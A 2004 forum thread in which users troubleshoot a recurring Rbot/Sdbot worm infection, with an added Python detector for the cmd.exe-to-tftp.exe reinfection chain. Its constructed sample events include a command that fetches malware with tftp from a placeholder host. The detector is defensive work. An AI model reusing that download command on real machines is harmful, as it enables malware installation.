W32/Rbot-AA uses
Original Message
Name: CaptainValor
Date: June 11, 2004 at 09:18:36 Pacific
Subject: W32/Rbot-AA uses
OS: Windows XP
CPU/RAM: Athlon 2500+, 512 MB
Comment: I've recently been infected by a rather persistent virus which I have come to believe is the "W32/Rbot-AA" worm. AVG identifies it as "IRC/Backdoor.Sdbot.27.AD" in the file "scrgrd.exe" in the %system% folder. AVG removes the file successfully, but about every 30 minutes or so, something happens... As I watch the task manager, two processes launch spontaneously, "tftp.exe" and then "cmd.exe". I can end neither of these processes (error message denies me access). In a few short seconds the processes terminate, and AVG notifies me that "scrgrd.exe" has been detected in the %system% folder again. I'm very perplexed by this situation. I have followed the removal instructions for the worm in the Sophos article for W32/Rbot-AA but have found none of the registry entries they reference. In the meantime, I have edited the permissions for "tftp.exe" to deny access to it by all but the SYSTEM. Any thoughts/suggestions? Do you think I've discovered a new variant?
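The reinfection loop described in this post (cmd.exe launching tftp.exe, then a fresh copy of scrgrd.exe appearing in the system folder about every 30 minutes) is a chain that host telemetry can flag even when the antivirus only sees the dropped file. The Python below is an added example, not code from this thread or from any vendor; it runs over a few constructed process-start and file-creation events in a simplified pipe-separated format (an assumption: real Sysmon or Windows 4688 events would first be normalised to these fields) and reports every tftp.exe that writes an executable into system32, together with its parent process and how often the same file keeps coming back.

```python
"""Flag the reinfection chain from the post: cmd.exe -> tftp.exe -> new .exe in system32.

Added example. The event lines below are constructed for illustration, not real telemetry.
Field layout (assumption): time|kind|pid|ppid|path|detail, where kind is "proc"
(process start, path = image) or "file" (file created by pid, path = file written).
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample: two rounds of the same drop, half an hour apart, plus noise.
# TFTP_HOST is a placeholder, not a real address.
SAMPLE_EVENTS = """\
2004-06-11T09:00:01|proc|1204|600|C:\\WINDOWS\\system32\\svchost.exe|-
2004-06-11T09:00:12|proc|1812|1204|C:\\WINDOWS\\system32\\cmd.exe|/c tftp -i TFTP_HOST GET scrgrd.exe
2004-06-11T09:00:13|proc|1820|1812|C:\\WINDOWS\\system32\\tftp.exe|-i TFTP_HOST GET scrgrd.exe
2004-06-11T09:00:15|file|1820|1812|C:\\WINDOWS\\system32\\scrgrd.exe|created
2004-06-11T09:05:00|proc|2000|1100|C:\\WINDOWS\\system32\\notepad.exe|-
2004-06-11T09:30:40|proc|2100|1204|C:\\WINDOWS\\system32\\cmd.exe|/c tftp -i TFTP_HOST GET scrgrd.exe
2004-06-11T09:30:41|proc|2108|2100|C:\\WINDOWS\\system32\\tftp.exe|-i TFTP_HOST GET scrgrd.exe
2004-06-11T09:30:43|file|2108|2100|C:\\WINDOWS\\system32\\scrgrd.exe|created
"""

SYSTEM_DIR = "c:\\windows\\system32\\"   # assumption: XP-era %system% location
DROP_WINDOW = timedelta(seconds=60)      # writes this soon after tftp.exe starts are attributed to it


@dataclass
class Event:
    time: datetime
    kind: str     # "proc" or "file"
    pid: int
    ppid: int
    path: str     # image path for "proc", written file for "file"
    detail: str


def parse_events(text: str) -> List[Event]:
    """Parse the simplified pipe-separated event lines; blank lines are skipped."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ts, kind, pid, ppid, path, detail = line.split("|", 5)
        events.append(Event(datetime.fromisoformat(ts), kind, int(pid), int(ppid), path, detail))
    return events


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect_tftp_drops(text: str, window: timedelta = DROP_WINDOW) -> List[Dict]:
    """Return one alert per executable that tftp.exe writes into the system directory.

    Each alert records the tftp.exe pid, the parent image (cmd.exe in the post) and the
    dropped path. Assumption: pids are not reused within the sample; a real pipeline
    would key processes by a unique process GUID instead.
    """
    events = parse_events(text)
    procs = {e.pid: e for e in events if e.kind == "proc"}
    alerts = []
    for e in events:
        if e.kind != "proc" or basename(e.path) != "tftp.exe":
            continue
        parent = procs.get(e.ppid)
        parent_name = basename(parent.path) if parent else "unknown"
        drops = [
            f for f in events
            if f.kind == "file" and f.pid == e.pid
            and e.time <= f.time <= e.time + window
            and f.path.lower().startswith(SYSTEM_DIR)
            and f.path.lower().endswith(".exe")
        ]
        for f in drops:
            alerts.append({
                "time": f.time.isoformat(),
                "tftp_pid": e.pid,
                "parent": parent_name,
                "dropped": f.path,
                "spawned_by_shell": parent_name == "cmd.exe",
            })
    return alerts


def recurring_drops(alerts: List[Dict]) -> Dict[str, List[int]]:
    """For files dropped more than once, return the gaps in seconds between successive drops.

    A steady interval (the post reports roughly 30 minutes) points at a scheduled
    re-download by something still resident rather than a one-off infection.
    """
    by_path: Dict[str, List[datetime]] = {}
    for a in alerts:
        by_path.setdefault(a["dropped"].lower(), []).append(datetime.fromisoformat(a["time"]))
    out = {}
    for path, times in by_path.items():
        if len(times) > 1:
            times.sort()
            out[path] = [int((b - a).total_seconds()) for a, b in zip(times, times[1:])]
    return out


if __name__ == "__main__":
    found = detect_tftp_drops(SAMPLE_EVENTS)
    for a in found:
        print(a)
    print("recurring:", recurring_drops(found))
```

On the constructed sample this yields two alerts, both with cmd.exe as the parent, and a single recurrence gap of 1828 seconds for scrgrd.exe; the notepad.exe start and the svchost.exe parent are ignored because they never write an executable into system32. The recurrence gap is the detail worth acting on: it says the dropper is still running on the box, which is why deleting scrgrd.exe alone does not end the loop.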
Response Number 3
Name: Jeruvy
Date: June 11, 2004 at 12:32:09 Pacific
Reply: The bot is bypassing your firewall using known methods, so you're right... but you're permitting its traffic nonetheless. You can stop this quickly at the firewall, and it is certainly recommended PRIOR to fixing the infection. Sounds like perhaps a rootkit is in place on the machine. Good luck, J. j e r u v y a t y a h o o d o t c o m
Response Number 4
Name: CaptainValor
Date: June 11, 2004 at 14:55:43 Pacific
Reply: I have downloaded VICE and scanned for rootkits. It detects 2, one in "%system%\setupapi.exe" and another in "%system%\ipodservice.exe". However, I am unfamiliar with how just exactly to deal with rootkits.
Response Number 5
Name: Jeruvy
Date: June 12, 2004 at 08:10:20 Pacific
Reply: Well, what is your goal? If it's to discover how you got it, then you'll want to look at forensic tools. If you just want to fix it, then a complete fresh install would be in order. There are numerous tools available for your needs; I would suggest going to http://www.securityfocus.com and checking out their section of tools for forensic analysis. You may also find some good information about how to perform the forensics in accordance with your needs. HTH, J. j e r u v y a t y a h o o d o t c o m
Response Number 6
Name: RMWXVI
Date: June 16, 2004 at 00:50:35 Pacific
Reply: Yeah, I'm having the same problem... my AVG found the same trojan, and I removed it to the Virus Vault... but after restart and rescan, AVG Resident Shield still says the trojan is there, but in C:\System Volume Information\_restore{541b3878-060b-4a6b-9506-e5c47d137969}\rp108\a0015900.exe. Any ideas of how to get rid of it? AVG scan doesn't find it... can't access the System Volume Information folder... am I screwed?
Response Number 7
Name: CYBERLORD
Date: June 16, 2004 at 10:01:52 Pacific
Reply: Robyn... your restore point was infected. No AV is going to delete any infected files in that area. You must turn off the restore option in your Windows. Restart your PC, so that the old restore file will be deleted. Scan your PC just in case and then activate the restore option again, and your problem will be solved. Regards from Panama
Response Number 8
Name: awbf
Date: June 16, 2004 at 12:38:05 Pacific
Reply: Actually, you can configure your system to not save restore information. This will delete your restore history and will clean System Volume Information.
Response Number 10
Name: GERAMI
Date: June 17, 2004 at 00:55:35 Pacific
Reply: Hi, I'm having the same problem with that trojan, but can't find any info on the web... It has been found in SCRGRD.exe, which I have deleted, but it still exists... I found out that the processes wnscpcc.exe and stcn.exe have something to do with it, so I deleted both, but after restart stcn.exe exists again... Also removing the "run" information in the registry doesn't help, because they restore themselves after restart... Can anyone tell me how to get rid of that thing???